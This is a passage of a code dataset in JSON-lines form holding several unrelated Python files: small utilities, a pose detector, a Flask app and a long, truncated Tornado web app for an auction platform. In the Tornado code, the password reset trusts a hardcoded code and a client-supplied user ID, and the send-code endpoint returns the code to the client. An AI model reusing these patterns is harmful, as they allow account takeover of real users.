int(add_minutes / 1440)\n result_minutes = start_minutes + add_minutes\n\n result_hh = int(result_minutes / 60)\n result_mm = result_minutes % 60\n\n # Output builder\n meridian_index = int(int(result_hh / 12) % 2)\n final_mm = str(result_mm)\n\n if len(final_mm) < 2:\n final_mm = '0' + final_mm\n\n while result_hh > 12:\n result_hh -= 12\n\n final_meridian = meridian[meridian_index]\n final_hh = str(result_hh)\n\n final_days = ''\n week_day_count = 0\n\n if meridian[0] == 'PM' and final_meridian == 'AM':\n if days_count < 1:\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count >= 1:\n final_days = final_days + f'({days_count + 1} days later)'\n week_day_count += days_count + 1\n elif meridian[0] == 'AM' and final_meridian == 'AM':\n if days_count == 1 or (days_count < 1 and add_minutes > 720):\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count > 1:\n final_days = final_days + f'({days_count} days later)'\n week_day_count += days_count\n elif meridian[0] == 'PM' and final_meridian == 'PM':\n if days_count == 1 or (days_count < 1 and add_minutes > 720):\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count > 1:\n final_days = final_days + f'({days_count} days later)'\n week_day_count += days_count\n elif meridian[0] == 'AM' and final_meridian == 'PM':\n if days_count < 1 and add_minutes > 720:\n final_days = final_days + '(next day)'\n week_day_count += 1\n elif days_count >= 1:\n final_days = final_days + f'({days_count + 1} days later)'\n week_day_count += days_count + 1\n\n week = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\n\n if week_day:\n day_index = week.index(week_day)\n rotated_week = week[day_index:] + week[:day_index]\n week_day = rotated_week[week_day_count % 7]\n\n # Return constructor\n new_time = new_time + final_hh + ':' + final_mm + ' ' + final_meridian\n\n if week_day and final_days:\n new_time = new_time + ', ' + week_day + ' ' + final_days\n elif final_days:\n new_time = new_time + ' ' + final_days\n elif week_day:\n new_time = new_time + ', ' + week_day\n\n return 
new_time\n","repo_name":"dr-rompecabezas/time-calculator","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7593444489","text":"class Solution:\n\n def letterCombinations(self, digits: str) -> List[str]:\n result = []\n if digits is None or len(digits) is 0:\n return result\n codes = {'0': ['0'],\n '1': ['1'],\n '2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n arr = [None] * len(digits)\n self.findcombinations(codes, 0, digits, result, arr)\n return result\n\n def findcombinations(self, codes, index, digits, result, arr):\n if index == len(digits):\n result.append(''.join(arr))\n return None\n\n curr_ = digits[index]\n chars = codes[curr_]\n\n for i in range(len(chars)):\n arr[index] = chars[i]\n self.findcombinations(codes, index + 1, digits, result, arr)\n","repo_name":"skumarUK/algo-experts","sub_path":"python/sandeepk/recursive/TelephoneWords.py","file_name":"TelephoneWords.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14001871834","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport sys\n\nimport npyscreen\nfrom requests import get\n\nimport inputForm\nimport profileSelector\n\n# GLOBALS ATTRIBUTES\nAPP = None\nGATEWAY = None\nTHREADS = list()\nVM = None\nVMs = None\nSECURITY_GROUP = None\nSECURITY_RULE = None\nIP = get(\"https://api.ipify.org\").text\n# Because it's cool but also a DDOS attack :)\n# So let's be cool with the API --> No auto refresh!\nPOLL_ENABLED = False\n\n# GLOBALS METHODS\n\n\ndef add_thread(t):\n THREADS.append(t)\n\n\ndef kill_threads():\n for t in THREADS:\n t.stop()\n t.join()\n\n\ndef exit():\n kill_threads()\n sys.exit(0)\n\n\n# APPLICATION CLASS\n\n\nclass App(npyscreen.StandardApp):\n def onStart(self):\n npyscreen.setTheme(npyscreen.Themes.ColorfulTheme)\n self.addForm(\"MAIN\", profileSelector.ProfileSelector,\n name=\"osc-cli-curses\")\n\n\n# LET'S RUN\nif __name__ == \"__main__\":\n APP = App()\n APP.run()\n","repo_name":"outscale-fne/osc-cli-curses","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"32502371130","text":"import facebook\r\n\"\"\"IMPORTANT: Facebook doesn't allow any more automated post so this script doesn't work any more :( \"\"\"\r\nFACEBOOK_PAGE_ID = \"aaa\"\r\nACCESS_TOKEN = \"aaa\"\r\n \r\ndef PostString(graph_instance, txt):\r\n \"\"\"Returns a Boolean\r\n\r\n Post a text\r\n \"\"\"\r\n try:\r\n graph_instance.put_object(FACEBOOK_PAGE_ID, \"feed\", message=txt)\r\n except:\r\n print(\"Exception at PostString\")\r\n return False\r\n return True\r\n \r\ndef GetGraphInstance():\r\n \"\"\"Returns a facebook GraphicAPI instance object\r\n\r\n Returns GraphAPI instance\r\n \"\"\"\r\n instance = facebook.GraphAPI(access_token=ACCESS_TOKEN)\r\n print(\"Session:\", instance.session)\r\n return instance\r\n\r\ndef PostImage(graph_instance, img_route, msg):\r\n \"\"\"Returns a Boolean\r\n\r\n Post an image\r\n \"\"\"\r\n try:\r\n image = open(img_route, 'rb')\r\n except:\r\n print(\"Exception at PostImage\")\r\n return False\r\n graph_instance.put_photo(image, 
message=msg)\r\n    return True\r\n\r\n# EXAMPLE:\r\n# PostImage(GetGraphInstance(), 'image_generated.png', '')\r\n","repo_name":"AgustinMachiavello/StarStickersForEverythingBot","sub_path":"SSGDjango/starstickersdjango/apps/starstickergenerator/scripts/FacebookApi.py","file_name":"FacebookApi.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"}
{"seq_id":"35006338714","text":"from flask import Flask, render_template, request\nimport covid19_stateprediction as cov\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n@app.route('/graph', methods=[\"GET\",\"POST\"])\ndef my_link():\n    if request.method == 'POST':\n        result = request.form\n        state = result['state']\n        # generate the prediction graph for the selected state\n        cov.lambda_handler(state)\n    # render for both GET and POST so the route never returns None\n    return render_template('graph.html')\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"shobhitsrivastava-ds/ML-MT-WebApp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"83"}
{"seq_id":"13726803198","text":"import cv2\nimport mediapipe as mp\nimport time\n\nclass poseDetector():\n\n    def __init__(self,\n                 static_image_mode=False,\n                 model_complexity=1,\n                 smooth_landmarks=True,\n                 enable_segmentation=False,\n                 smooth_segmentation=True,\n                 min_detection_confidence=0.5,\n                 min_tracking_confidence=0.5):\n        self.mode = static_image_mode\n        self.complexity = model_complexity\n        self.landmarks = smooth_landmarks\n        self.enable_segmentation = enable_segmentation\n        self.smooth_segmentation = smooth_segmentation\n        self.detection_confidence = min_detection_confidence\n        self.tracking_confidence = min_tracking_confidence\n        self.mpPose = mp.solutions.pose\n        self.pose = self.mpPose.Pose(static_image_mode=self.mode,\n                                     model_complexity=self.complexity,\n                                     smooth_landmarks=self.landmarks,\n                                     enable_segmentation=self.enable_segmentation,\n                                     smooth_segmentation=self.smooth_segmentation,\n                                     min_detection_confidence=self.detection_confidence,\n                                     min_tracking_confidence=self.tracking_confidence)\n        self.mpDraw = mp.solutions.drawing_utils\n        self.results = None\n\n    \n    def findPose(self, img, draw=True):\n        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n        self.results = self.pose.process(imgRGB)\n        if draw and self.results.pose_landmarks:\n            self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,\n                                       self.mpPose.POSE_CONNECTIONS)\n    \n    def getPosition(self, img, draw=True):\n        lmList = []\n        if self.results.pose_landmarks:\n            for id, lm in enumerate(self.results.pose_landmarks.landmark):\n                # Note: lm.x and lm.y are not pixel positions on the image; they are\n                # ratios, so multiply by width and height to get pixel coordinates\n                h, w, _= img.shape\n                cx, cy = int(lm.x*w), int(lm.y*h)\n                lmList.append([id, cx, cy])\n                if draw:\n                    cv2.circle(img, (cx,cy), 10, (255, 0,0), cv2.FILLED)\n        return lmList\n    \n\n\n\n\ndef main():\n    cap = cv2.VideoCapture('PoseVideos/3.mp4')\n    pTime = 0\n    detector = poseDetector()\n    while True:\n        success, img = cap.read()\n        detector.findPose(img)\n        lmList = detector.getPosition(img)\n        # compute the fps of the video that is playing\n        cTime = time.time()\n        fps = 1/(cTime-pTime)\n        pTime = cTime\n        # overlay the frame rate so it is visible\n        cv2.putText(img, str(int(fps)), (70,50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0,0), 3)\n\n        cv2.imshow(\"Image:\", img)\n        cv2.waitKey(1)\n\n\nif __name__ == \"__main__\":\n    
main()","repo_name":"natek-1/ComputerVision","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35886832209","text":"import os\r\n\r\n\r\npath = \"./mlm_evalnew\" #文件夹目录\r\noutput = \"。/valid.txt\"\r\nout = open(output,\"w\")\r\nqa_set = []\r\nfor root, dirs, files in os.walk(path):\r\n for file in files:\r\n str1 = os.path.join(root,file)\r\n file = open(str1,\"r\")\r\n s = file.read()\r\n w = out.write(s)\r\n w = out.write('\\n')\r\n","repo_name":"Smallqqqq/DeployQA","sub_path":"DeployQA/mlm/mlm_processor.py","file_name":"mlm_processor.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19182612777","text":"# Error 생성 Exception 처리\nclass BigNumberError(Exception):\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n\ntry:\n print(\"한 자리 숫자 나누기 전용 계산기\")\n num1 = int(input(\"첫 번째 숫자를 입력하세요: \"))\n num2 = int(input(\"두 번째 숫자를 입력하세요: \"))\n if num1 >= 10 or num2 >= 10:\n raise BigNumberError(\"입력값: {0}, {1}\".format(num1, num2))\n print(\"{0} / {1} = {2}\".format(num1, num2, int(num1/num2)))\nexcept ValueError:\n print(\"잘못된 값을 입력했습니다.\")\nexcept BigNumberError as ex:\n print(\"오류: 한 자리 숫자만 입력하세요\")\n print(ex)\n# try 실행 시 Error 발생 여부와 상관없이 실행\nfinally:\n print(\"계산기를 이용해 주셔서 감사합니다.\")\n","repo_name":"dmlee19/PythonTutorial","sub_path":"i_exception/createException.py","file_name":"createException.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5962639982","text":"# utf:8\nimport copy\n\nimport os.path\nimport json\nimport yaml\nfrom datetime import datetime\n\n\nimport tornado\nfrom tornado import escape, gen, httpserver, ioloop, web, websocket\n\nfrom sqlalchemy.exc import IntegrityError,DBAPIError\nfrom sqlalchemy import func\n\nfrom ORM import Session\nfrom ORM.Tables.User import User\n\nfrom ORM.Tables.Praise import MessagePraise\nfrom ORM.Tables.Message import MessageBoard\nfrom ORM.Tables.UserBank import UserBank\nfrom ORM.Tables.OrderSub import OrderSub\nfrom ORM.Tables.UserWithdraw import UserWithdraw\nfrom ORM.Tables.Product import Product\n\nfrom ORM.Tables.ChinaAreas import ChinaAreas\n\nimport Common\nfrom Commands.Command import Command\nfrom Commands.UserHandler import UserHandler\nfrom Commands.ProductHandler import ProductHandler\nfrom Commands.OrderHandler import OrderHandler\nfrom Commands.OrderDealHandler import OrderDealHandler\n\nimport logging\nimport logging.config\n\nimport redis\nimport math, operator, time\n\nfrom Configuration import ConfigParser\n\n\nclass Application(tornado.web.Application):\n\n def __init__(self):\n\n logging.config.dictConfig(yaml.load(open(os.path.realpath('log.yaml'), 'r')))\n logging.getLogger('sqlalchemy.engine').setLevel(logging.DEBUG)\n logging.getLogger('sqlalchemy.pool').setLevel(logging.WARN)\n\n\n handlers = [\n (r\"/\", HomeHandler),\n # 增加 demo,\n (r\"/user/ajax_login\",UserAjaxLogin),\n #用户注册\n (r\"/url/numregisted\",UserNumRegisted),\n #忘记密码\n (r\"/url/forget_password\",UserForgetPassword),\n # 发送验证码\n (r\"/url/sendcode\",UserSendCodeHandler),\n #找回密码的验证\n (r\"/url/identity_check\",UserIdentityCheck),\n\n # 留言板\n (r\"/user/message\", UserMessageHandler),\n\n # 留言板列表\n 
(r\"/user/message_details\",MessageListHandler),\n\n # 删除留言列表\n (r\"/user/message_delete\",MessageDeleteHandler),\n\n # 追加留言\n (r\"/user/message_addition\",MessageAdditionHandler),\n\n # 留言置顶\n # (r\"/user/message_top\",MessageTopHandler),\n\n # 点赞功能\n (r\"/user/getpraise\",GetPraiseHandler),\n\n # 新增加收货地址\n (r\"/user/show_add_address\",ShopAddrssHandler),\n\n (r\"/user/create\", UserCreateHandler),\n (r\"/user/login\", UserLoginHandler),\n (r\"/user/logout\", UserLogoutHandler),\n (r\"/user/console\", UserConsoleHandler),\n (r\"/user/profile\", UserProfileHandler),\n (r\"/user/update\", UserUpdateHandler),\n (r\"/user/wallet\", UserWalletHandler),\n (r\"/user/withdraw\", UserWithdrawHandler),\n (r\"/user/withdraw-history\", UserWithdrawHistoryHandler),\n (r\"/user/deposit-history\", UserDepositHistoryHandler),\n (r\"/user/subbuy\", UserSubBuyHandler),\n (r\"/user/buy\", UserBuyHandler),\n (r\"/user/sale\", UserSaleHandler),\n (r\"/user/orders\", UserOrdersHandler),\n (r\"/transaction\", TransactionSocketHandler),\n (r\"/product/list\", ProductListHandler),\n (r\"/product/detail\", ProductDetailHandler),\n (r\"/product/buy\", ProductBuyHandler),\n (r\"/product/sale\", ProductSaleHandler),\n (r\"/product/order\", ProductOrderHandler),\n (r\"/product/assets\", ProductAssetsHandler),\n (r\"/order/cancel\", OrderCancelHandler),\n (r\"/bank/create\", BankCreateHandler),\n (r\"/api/transaction/products\", TransactionProductsHandler)\n ]\n\n settings = dict(\n site_title=u\"吾品玉艺玉文化产权拍卖服务平台\",\n template_path=os.path.join(os.path.dirname(__file__), \"WWW/templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"WWW/static\"),\n #ui_modules={\"Entry\": EntryModule},\n xsrf_cookie=True,\n cookie_secret=\"xxddfewr44343gfd32dsf3ds22d\",\n debug=True,\n )\n\n super(Application, self).__init__(handlers, **settings)\n\n self.session = Session()\n\n try:\n self.redis = redis.StrictRedis(ConfigParser.get('wx.redis.config','host'),ConfigParser.get('wx.redis.config','port'))\n\n except redis.ConnectionError as e:\n logging.warning(e.args[0])\n exit(0)\n else:\n logging.info('Connected to the redis:{}....'.format(self.redis))\n\n\n\nclass BaseHandler(tornado.web.RequestHandler): # BHandler,可以自定义采用的模板,所有的handler都继承这个类\n\n @property\n def session(self):\n return self.application.session\n\n @property\n def redis(self):\n return self.application.redis\n# 验证用户登录状态 user_id\n def get_current_user(self):\n user_id = self.get_secure_cookie(\"wx_user_id\")\n if not user_id:\n return None\n\n #TODO only return the user object and need sub class to check user status\n try:\n user = self.session.query(User).get(user_id)\n except DBAPIError as e :\n self.session.rollback()\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n finally:\n self.session.close()\n\n if not user:\n user = self.session.query(User).get(user_id)\n\n return user\n\nclass HomeHandler(BaseHandler):\n\n def get(self):\n referrer = self.get_query_argument('referrer',0)\n self.set_secure_cookie('referrer_id', str(referrer))\n\n self.render(\"home.html\",referrer=referrer)\n\nclass UserCreateHandler(BaseHandler):\n\n def get(self):\n self.render(\"user/create.html\", referrer_id=self.get_secure_cookie('referrer_id'))\n\n def post(self):\n user = User()\n user.login_name = self.get_argument('login_name')\n user.login_pass = User.encrypt_pass(self.get_argument('login_pass'))\n user.real_name = self.get_argument('realname')\n user.id_no = self.get_argument('id_no')\n user.mobile = self.get_argument('mobile')\n\n if 
self.get_argument('display_name',None):\n            user.display_name = self.get_argument('display_name')\n        else:\n            user.display_name = user.login_name\n\n        user.status = User.UserStatusPending\n\n        user.referrer_id = self.get_argument('referrer', 0)\n\n        if UserHandler.checkIdNo(user.id_no):\n            data = {'result': 'error', 'msg': 'This ID number is already registered!'}\n            self.write(json.JSONEncoder().encode(data))\n            return\n\n        try:\n            self.session.add(user)\n            self.session.commit()\n\n            data = {'result': 'success', 'msg': user.id}\n            self.write(json.JSONEncoder().encode(data))\n        except IntegrityError as e:\n            self.session.close()\n            if 'login_name' in e.args[0]:\n                msg = self.get_argument('login_name') + ' is already registered!'\n            elif 'mobile' in e.args[0]:\n                msg = self.get_argument('mobile') + ' is already registered!'\n            else:\n                msg = 'Unknown error, please contact the platform'\n\n            data = {'result':'error', 'msg':msg}\n            self.write(json.JSONEncoder().encode(data))\n\n        except DBAPIError as e:\n            if e.connection_invalidated:\n                logging.warning('database connection invalid')\n\n            data = {'result': 'error', 'msg': 'database connection invalid'}\n            self.write(json.JSONEncoder().encode(data))\n        except Exception as e:\n            print(e.args[0])\n\n        finally:\n            self.session.close()\n\n\n\nclass UserNumRegisted(BaseHandler):\n    # check whether the user is registered; if so, go to the login page\n    def get(self):\n        self.render(\"user/login.html\",error=None)\n    def post(self):\n        pass\n\n    # otherwise, register\n\n\n# the user forgot their password\nclass UserForgetPassword(BaseHandler):\n\n    def get(self):\n        self.render(\"user/forget_password.html\", error=None)\n\n\n# send a verification code: call a third-party API with the user's mobile number\nclass UserSendCodeHandler(BaseHandler):\n\n    def post(self):\n        mobile = self.get_argument('mobile')\n        data = {}\n        data['result'] = 'success'\n        data['code'] = '2222'\n        self.write(json.JSONEncoder().encode(data))\n\n\n\n\n# submit verification: the code and the new password\nclass UserIdentityCheck(BaseHandler):\n\n    def post(self):\n        user_id = self.get_argument('wx-user-id')\n        mobile = self.get_argument('mobile')\n        code = self.get_argument('code')\n        newpassword = self.get_argument('newpassword')\n        confirmnewpassword = self.get_argument('confirmnewpassword')\n\n        if code =='123456':\n            # update the mobile number and the (encrypted) password in the database\n            self.session.query(User.mobile,User.login_pass).filter(User.id == user_id).update({User.mobile:mobile,User.login_pass:User.encrypt_pass(confirmnewpassword)})\n            self.session.commit()\n            data = {'result':'success','msg':'password updated'}\n        else:\n            data = {'result':'error','msg':'failed to update the password'}\n\n        self.write(json.JSONEncoder().encode(data))\n\n\n\n# custom JSON encoder to work around datetime objects not being serializable\n#TypeError: Object of type 'datetime' is not JSON serializable\nclass CJsonEncoder(json.JSONEncoder):\n\n    def default(self,obj):\n        if isinstance(obj,datetime):\n            return obj.strftime('%Y-%m-%d %H:%M:%S')\n        else:\n            return json.JSONEncoder.default(self,obj)\n\n\n\n\nclass UserMessageHandler(BaseHandler):\n\n    def get(self):\n\n        user_id = 
self.get_argument(\"user_id\")\n\n top_flag_id = self.get_argument('top_flag_id')\n print('----------------'+top_flag_id)\n\n isTOP = self.session.query(MessageBoard).filter(MessageBoard.id == top_flag_id).update({MessageBoard.isTOP:1,MessageBoard.created_at:datetime.now()})\n # addition_id = self.get_argument('addition_id')\n # print('parentid+++++&&&&+++++'+addition_id)\n # print(isTOP)\n self.session.commit()\n\n\n reply_lists = self.session.query(MessageBoard.parentid,MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at).filter(MessageBoard.check_status == 2).order_by( MessageBoard.created_at.desc()).all()\n print('this result is reply_list:')\n print(reply_lists)\n\n check_praise_num = self.session.query(MessagePraise.message_id,func.count('*').label('message_count')).group_by(MessagePraise.message_id).all()\n print(\"分组统计check_praise_num:\")\n print(check_praise_num)\n\n check_message_praise = self.session.query(MessagePraise.user_id, MessagePraise.message_id).all()\n\n if isTOP:\n\n message_lists = self.session.query(MessageBoard.id,MessageBoard.user_name,MessageBoard.comment,MessageBoard.created_at,MessageBoard.praise_num,MessageBoard.is_praise).filter(MessageBoard.check_status==0).order_by(MessageBoard.created_at.desc(),MessageBoard.isTOP.desc()).limit(6).all()\n\n mergeds = []\n for message_list in message_lists:\n li = []\n li.append(message_list)\n for reply_list in reply_lists:\n if reply_list.parentid == message_list.id:\n li.append(reply_list)\n mergeds.append(li)\n\n print(mergeds)\n print('ppppppppppppppppppppppppppppppp')\n\n\n my_list = []\n for sencode_list in mergeds: # 遍历已经处理好的子评论追加到对应的主评论上\n # print(sencode_list)\n\n if len(sencode_list) != 1: # 判断:如果list的长度为1的话,只有主评论\n children_lists = copy.deepcopy(sencode_list) # 这里是deepcopy的知识点,不会破坏原先的数据\n # print('result children_lists')\n print(children_lists)\n children_lists.remove(children_lists[0]) # 踢出主评论,元素位置为[0]\n my_list.append(children_lists)\n # print('remove the list[0]')\n # print(children_lists)\n print (my_list)\n\n self.render(\"user/message_board.html\", message_lists = mergeds,children_lists=my_list,check_message_praise=check_message_praise,user_id=user_id)\n\n else:\n message_lists = self.session.query(MessageBoard.id, MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at,MessageBoard.praise_num,MessageBoard.is_praise).filter(MessageBoard.check_status == 0).order_by(MessageBoard.created_at.desc()).limit(6).all()\n mergeds = []\n # children_lists=[]\n for message_list in message_lists:\n li = []\n li.append(message_list)\n for reply_list in reply_lists:\n if reply_list.parentid == message_list.id:\n li.append(reply_list)\n mergeds.append(li)\n print(mergeds)\n\n\n my_list = []\n for sencode_list in mergeds: # 遍历已经处理好的子评论追加到对应的主评论上\n # print(sencode_list)\n\n if len(sencode_list) != 1: # 判断:如果list的长度为1的话,只有主评论\n children_lists = copy.deepcopy(sencode_list) # 这里是deepcopy的知识点,不会破坏原先的数据\n # print('result children_lists')\n print(children_lists)\n children_lists.remove(children_lists[0]) # 踢出主评论,元素位置为[0]\n my_list.append(children_lists)\n # print('remove the list[0]')\n # print(children_lists)\n print (my_list)\n\n self.render(\"user/message_board.html\", message_lists = mergeds,children_lists=my_list,check_message_praise=check_message_praise,user_id=user_id)\n\n\n\n\n\n def post(self):\n comments= self.get_argument('comments')\n user_name = self.get_argument('user_name')\n check_status = self.get_argument('check_status')\n create_time = datetime.now()\n\n\n user_id = 1\n #user_id 
可以通过user_name为条件 查询用户表得到 select user_id from user where user_name='1'\n message = MessageBoard()\n message.comment = comments\n message.user_name = user_name\n message.check_status = check_status\n message.created_at = create_time\n message.user_id = user_id\n # id = self.session.query(MessageBoard.id).filter(MessageBoard.user_name == user_name ).one_or_none()\n # print(id)\n\n# 数据提交操作\n try:\n self.session.add(message)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'comments': comments, 'user_name':user_name,'create_time':create_time,'msg':message.id}\n\n finally:\n self.session.close()\n\n self.write(json.dumps(data,cls=CJsonEncoder)) # 将dict转换成json\n\n\n# 评论详情\nclass MessageListHandler(BaseHandler):\n\n def get(self):\n message_id = self.get_argument('message_id')\n message_list = self.session.query(MessageBoard.comment).filter(MessageBoard.id == message_id)\n\n self.render(\"user/message_details.html\", message_list=message_list)\n\n\n# 列表的删除\nclass MessageDeleteHandler(BaseHandler):\n\n def post(self):\n delete_id = self.get_argument('delete_id')\n print (delete_id)\n\n delete_message = self.session.query(MessageBoard).filter(MessageBoard.id == delete_id).delete()\n self.session.commit() # 记得数据的修改操作一定要提交,查询操作可以不用commit\n\n if delete_message:\n msg = \"删除成功\"\n data = {'result': 'success', 'msg': msg}\n else:\n data = {'result': 'error', 'msg': '删除错误'}\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass MessageAdditionHandler(BaseHandler):\n\n def get(self):\n addition_id = self.get_argument('addition_id')\n print('^^^^^^^addition_id***********@@@@@@@@@@!!!!!!'+addition_id)\n\n is_added=self.session.query(MessageBoard).filter(MessageBoard.id == addition_id).update({MessageBoard.isadded:1})\n self.session.commit()\n if is_added:\n add_message = self.session.query(MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at).filter(MessageBoard.isadded == 1).order_by(MessageBoard.created_at.desc()).all()\n # print (add_message)\n # self.render(\"user/message_board.html\",add_message=add_message)\n else:\n return 0\n\n #isadded 字段更新\n def post(self):\n\n comments = self.get_argument('comments')\n user_name = self.get_argument('user_name')\n check_status = self.get_argument('check_status')\n parentid = self.get_argument('parentid')\n create_time = datetime.now()\n user_id = 1\n # user_id 可以通过user_name为条件 查询用户表得到 select user_id from user where user_name='1'\n message = MessageBoard()\n message.comment = comments\n message.user_name = user_name\n message.check_status = check_status\n message.created_at = create_time\n message.user_id = user_id\n message.parentid = parentid\n # 数据提交操作\n try:\n self.session.add(message)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'comments': comments, 'user_name': user_name, 'create_time': create_time}\n\n finally:\n self.session.close()\n\n self.write(json.dumps(data, cls=CJsonEncoder)) # 将dict转换成json\n\n # 留言的置顶\n# class MessageTopHandler(BaseHandler):\n\n # def post(self):\n #\n # top_flag_id = self.get_argument('top_flag_id')\n # print (top_flag_id)\n #\n # try:\n # self.session.query(MessageBoard).filter(MessageBoard.id == top_flag_id).update({MessageBoard.isTOP:1})\n # top_message =self.session.query(MessageBoard.id,MessageBoard.created_at).order_by(MessageBoard.isTOP ,MessageBoard.created_at.desc()).all()\n # self.session.commit()\n # print 
(top_message)\n # except DBAPIError as e:\n # self.session.rollback()\n # data = {'result':'error','msg':e.args[0]}\n # self.write(json.JSONEncoder().encode(data))\n # else:\n # data = {'result': 'success', 'msg': 'okay'}\n # self.write(json.JSONEncoder().encode(data))\n # self.render(\"user/message_board.html\", message_list=top_message)\n #\n # finally:\n # self.session.close()\n\n\nclass GetPraiseHandler(BaseHandler):\n\n\n def get(self):\n\n praise_id = self.get_argument('praise_id')\n print(\"the praise_id is:\")\n print(praise_id)\n\n # 判断用户是否登录\n user_id = self.get_secure_cookie(\"wx-user-id\")\n print('self.get_secure_cookie user_id:')\n print (user_id)\n real_user_id = self.get_argument(\"user_id\")\n # 查询另一张表里的用户id,文章id\n message_praise = self.session.query(MessagePraise.user_id,MessagePraise.message_id).all()\n print(\"mysql message_praise\")\n print(message_praise)\n resent_praise =(int(real_user_id),int(praise_id)) # 将string转换成int\n print(resent_praise)\n\n if resent_praise in message_praise:\n print(\"***8***8*****8******\")\n # 删除\n self.session.query(MessagePraise.id,MessagePraise.user_id,MessagePraise.message_id).filter(MessagePraise.message_id == praise_id,MessagePraise.user_id==real_user_id).delete()\n # 文章计数 -1\n praise_num = self.session.query(MessageBoard).filter(MessageBoard.id == praise_id).update({MessageBoard.praise_num:MessageBoard.praise_num - \"1\"})\n\n print(\"****\",praise_id,\"*******\")\n check_praise_num = self.session.query(func.count('MessagePraise.*')).filter(MessagePraise.message_id == praise_id).one_or_none()\n result_list = self.session.query(MessagePraise.user_id,MessagePraise.message_id).all()\n\n print(\"删除后的数据结构是这样的:\")\n print(result_list)\n self.session.commit\n #check_praise_num = self.session.query(MessagePraise).filter(MessagePraise.message_id == 7).count()\n\n print(\"取消赞的时候,数据库-1:\")\n print(check_praise_num)\n data = {'result':'error','msg':'您已取消点赞','praise_num':check_praise_num[0]}\n\n\n\n\n self.write(json.JSONEncoder().encode(data))\n\n else:\n praise = MessagePraise()\n praise.user_id = real_user_id\n praise.message_id = praise_id\n\n # 文章计数 +1\n\n praise_num = self.session.query(MessageBoard.praise_num).filter(MessageBoard.id == praise_id).update({MessageBoard.praise_num:MessageBoard.praise_num + \"1\"})\n\n # check_praise_num = self.session.query(MessageBoard.praise_num).filter(MessageBoard.id == praise_id).one_or_none()\n # check_praise_num = self.session.query(func.count('*')).filter(MessagePraise.message_id == praise_id ).limit(1).scalar()\n\n\n self.session.commit()\n\n\n try:\n self.session.add(praise)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n check_praise_num = self.session.query(func.count('*')).filter(MessagePraise.message_id == praise_id).scalar()\n print(\"______praise_num______\")\n print(check_praise_num)\n data ={'result':'success','msg':'点赞成功','praise_num':check_praise_num}\n finally:\n self.session.close()\n print(\"+++++++==============++++++++============\")\n self.write(json.JSONEncoder().encode(data))\n\n\n# 显示收货地址\nclass ShopAddrssHandler(BaseHandler):\n\n def get(self):\n user_id = self.get_argument('user_id')\n provinceid = self.get_argument('provinceid')\n\n\n # 获取数据库里的省,市,区的数据\n area_provinces = self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 1).all()\n print('QQQQQQQPPPPPP#######@@@@!!!!area_list')\n area_citys = 
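# Two apparent bugs in GetPraiseHandler above: (1) the un-like branch ends
# with `self.session.commit` without parentheses, so the delete and the
# praise_num decrement are never committed; (2) praise_num is adjusted with
# the string "1" rather than the integer 1, which only works where the
# driver coerces it. A corrected toggle, sketched with the record's models:
def toggle_praise(session, user_id, message_id):
    existing = session.query(MessagePraise).filter(
        MessagePraise.user_id == user_id,
        MessagePraise.message_id == message_id,
    ).one_or_none()
    delta = -1 if existing else 1
    if existing:
        session.delete(existing)
    else:
        session.add(MessagePraise(user_id=user_id, message_id=message_id))
    session.query(MessageBoard).filter(MessageBoard.id == message_id).update(
        {MessageBoard.praise_num: MessageBoard.praise_num + delta})
    session.commit()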
